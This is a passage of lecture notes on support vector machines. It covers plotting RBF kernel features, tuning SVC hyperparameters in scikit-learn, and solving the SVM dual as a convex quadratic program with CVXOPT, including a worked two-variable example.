plt.plot(x1s, x3s, "b:")
plt.gca().get_yaxis().set_ticks([0, 0.25, 0.5, 0.75, 1])
plt.xlabel(r"$x_1$", fontsize=20)
plt.ylabel(r"Similarity", fontsize=14)
plt.annotate(r'$\mathbf{x}$',
xy=(X1D[3, 0], 0),
xytext=(-0.5, 0.20),
ha="center",
arrowprops=dict(facecolor='black', shrink=0.1),
fontsize=18,
)
plt.text(-2, 0.9, "$x_2$", ha="center", fontsize=20)
plt.text(1, 0.9, "$x_3$", ha="center", fontsize=20)
plt.axis([-4.5, 4.5, -0.1, 1.1])
plt.subplot(122)
plt.grid(True, which='both')
plt.axhline(y=0, color='k')
plt.axvline(x=0, color='k')
plt.plot(XK[:, 0][yk==0], XK[:, 1][yk==0], "bs")
plt.plot(XK[:, 0][yk==1], XK[:, 1][yk==1], "g^")
plt.xlabel(r"$x_2$", fontsize=20)
plt.ylabel(r"$x_3$ ", fontsize=20, rotation=0)
plt.annotate(r'$\phi\left(\mathbf{x}\right)$',
xy=(XK[3, 0], XK[3, 1]),
xytext=(0.65, 0.50),
ha="center",
arrowprops=dict(facecolor='black', shrink=0.1),
fontsize=18,
)
plt.plot([-0.1, 1.1], [0.57, -0.1], "r--", linewidth=3)
plt.axis([-0.1, 1.1, -0.1, 1.1])
plt.subplots_adjust(right=1)
plt.show()
x1_example = X1D[3, 0]
for landmark in (-2, 1):
k = gaussian_rbf(np.array([[x1_example]]), np.array([[landmark]]), gamma)
print("Phi({}, {}) = {}".format(x1_example, landmark, k))
rbf_kernel_svm_clf = Pipeline([
("scaler", StandardScaler()),
("svm_clf", SVC(kernel="rbf", gamma=5, C=0.001))
])
rbf_kernel_svm_clf.fit(X, y)
from sklearn.svm import SVC
gamma1, gamma2 = 0.1, 5
C1, C2 = 0.001, 1000
hyperparams = (gamma1, C1), (gamma1, C2), (gamma2, C1), (gamma2, C2)
svm_clfs = []
for gamma, C in hyperparams:
rbf_kernel_svm_clf = Pipeline([
("scaler", StandardScaler()),
("svm_clf", SVC(kernel="rbf", gamma=gamma, C=C))
])
rbf_kernel_svm_clf.fit(X, y)
svm_clfs.append(rbf_kernel_svm_clf)
plt.figure(figsize=(11, 7))
for i, svm_clf in enumerate(svm_clfs):
plt.subplot(221 + i)
plot_predictions(svm_clf, [-1.5, 2.5, -1, 1.5])
plot_dataset(X, y, [-1.5, 2.5, -1, 1.5])
gamma, C = hyperparams[i]
plt.title(r"$\gamma = {}, C = {}$".format(gamma, C), fontsize=16)
plt.show()
## Mathematical optimization of convex functions
A mathematical (quadratic) optimization problem, or just optimization problem, has the form
$$
\begin{align*}
&\mathrm{min}_{\lambda}\hspace{0.2cm} \frac{1}{2}\boldsymbol{\lambda}^T\boldsymbol{P}\boldsymbol{\lambda}+\boldsymbol{q}^T\boldsymbol{\lambda},\\ \nonumber
&\mathrm{subject\hspace{0.1cm}to} \hspace{0.2cm} \boldsymbol{G}\boldsymbol{\lambda} \preceq \boldsymbol{h} \wedge \boldsymbol{A}\boldsymbol{\lambda}=f.
\end{align*}
$$
subject to some constraints for say a selected set $i=1,2,\dots, n$.
In our case we are optimizing with respect to the Lagrangian multipliers $\lambda_i$, and the
vector $\boldsymbol{\lambda}=[\lambda_1, \lambda_2,\dots, \lambda_n]$ is the optimization variable we are dealing with.
In our case we are particularly interested in a class of optimization problems called convex optimization problems.
In our discussion on gradient descent methods we discussed at length the definition of a convex function.
Convex optimization problems play a central role in applied mathematics and we recommend strongly [Boyd and Vandenberghe's text on the topics](http://web.stanford.edu/~boyd/cvxbook/).
If we use Python as programming language and wish to venture beyond
**scikit-learn**, **tensorflow** and similar software which makes our
lives so much easier, we need to dive into the wonderful world of
quadratic programming. We can, if we wish, solve the minimization
problem using say standard gradient methods or conjugate gradient
methods. However, these methods tend to exhibit a rather slow
converge. So, welcome to the promised land of quadratic programming.
The functions we need are contained in the quadratic programming package **CVXOPT** and we need to import it together with **numpy** as
import numpy
import cvxopt
This will make our life much easier. You don't need to write your own optimizer.
We remind ourselves about the general problem we want to solve
$$
\begin{align*}
&\mathrm{min}_{x}\hspace{0.2cm} \frac{1}{2}\boldsymbol{x}^T\boldsymbol{P}\boldsymbol{x}+\boldsymbol{q}^T\boldsymbol{x},\\ \nonumber
&\mathrm{subject\hspace{0.1cm} to} \hspace{0.2cm} \boldsymbol{G}\boldsymbol{x} \preceq \boldsymbol{h} \wedge \boldsymbol{A}\boldsymbol{x}=f.
\end{align*}
$$
Let us show how to perform the optimization using a simple case. Assume we want to optimize the following problem
$$
\begin{align*}
&\mathrm{min}_{x}\hspace{0.2cm} \frac{1}{2}x^2+3x+4y \\ \nonumber
&\mathrm{subject to} \\ \nonumber
&x, y \geq 0 \\ \nonumber
&x+3y \geq 15 \\ \nonumber
&2x+5y \leq 100 \\ \nonumber
&3x+4y \leq 80. \\ \nonumber
\end{align*}
$$
The minimization problem can be rewritten in terms of vectors and matrices as (with $x$ and $y$ being the unknowns)
$$
\frac{1}{2}\begin{bmatrix} x\\ y \end{bmatrix}^T \begin{bmatrix} 1 & 0\\ 0 & 0 \end{bmatrix} \begin{bmatrix} x \\ y \end{bmatrix} + \begin{bmatrix}3\\ 4 \end{bmatrix}^T \begin{bmatrix}x \\ y \end{bmatrix}.
$$
Similarly, we can now set up the inequalities (we need to change $\geq$ to $\leq$ by multiplying with $-1$ on both sides) as the following matrix-vector equation
$$
\begin{bmatrix} -1 & 0 \\ 0 & -1 \\ -1 & -3 \\ 2 & 5 \\ 3 & 4\end{bmatrix}\begin{bmatrix} x \\ y\end{bmatrix} \preceq \begin{bmatrix}0 \\ 0\\ -15 \\ 100 \\ 80\end{bmatrix}.
$$
We have collapsed all the inequalities into a single matrix $\boldsymbol{G}$. We see also that our matrix
$$
\boldsymbol{P} =\begin{bmatrix} 1 & 0\\ 0 & 0 \end{bmatrix}
$$
is clearly positive semi-definite (all eigenvalues larger or equal zero).
Finally, the vector $\boldsymbol{h}$ is defined as
$$
\boldsymbol{h} = \begin{bmatrix}0 \\ 0\\ -15 \\ 100 \\ 80\end{bmatrix}.
$$
Since we don't have any equalities the matrix $\boldsymbol{A}$ is set to zero.
The following code solves the equations for us
# Import the necessary packages
import numpy
from cvxopt import matrix
from cvxopt import solvers
P = matrix(numpy.diag([1,0]), tc=’d’)
q = matrix(numpy.array([3,4]), tc=’d’)
G = matrix(numpy.array([[-1,0],[0,-1],[-1,-3],[2,5],[3,4]]), tc=’d’)
h = matrix(numpy.array([0,0,-15,100,80]), tc=’d’)
# Construct the QP, invoke solver
sol = solvers.qp(P,q,G,h)
# Extract optimal value and solution
sol[’x’]
sol[’primal objective’]
We are now ready to return to our setup of the optimization problem for a more realistic case. Introducing the **slack** parameter $C$ we have
$$
\frac{1}{2} \boldsymbol{\lambda}^T\begin{bmatrix} y_1y_1K(\boldsymbol{x}_1,\boldsymbol{x}_1) & y_1y_2K(\boldsymbol{x}_1,\boldsymbol{x}_2) & \dots & \dots & y_1y_nK(\boldsymbol{x}_1,\boldsymbol{x}_n) \\
y_2y_1K(\boldsymbol{x}_2,\boldsymbol{x}_1) & y_2y_2K(\boldsymbol{x}_2,\boldsymbol{x}_2) & \dots & \dots & y_2y_nK(\boldsymbol{x}_2,\boldsymbol{x}_n) \\
\dots & \dots & \dots & \dots & \dots \\
\dots & \dots & \dots & \dots & \dots \\
y_ny_1K(\boldsymbol{x}_n,\boldsymbol{x}_1) & y_ny_2K(\boldsymbol{x}_n,\boldsymbol{x}_2) & \dots & \dots & y_ny_nK(\boldsymbol{x}_n,\boldsymbol{x}_n) \\
\end{bmatrix}\boldsymbol{\lambda}-\mathbb{I}\boldsymbol{\lambda},
$$
subject to $\boldsymbol{y}^T\boldsymbol{\lambda}=0$. Here we defined the vectors $\boldsymbol{\lambda} =[\lambda_1,\lambda_2,\dots,\lambda_n]$ and
$\boldsymbol{y}=[y_1,y_2,\dots,y_n]$.
With the slack constants this leads to the additional constraint $0\leq \lambda_i \leq C$.
**code will be added**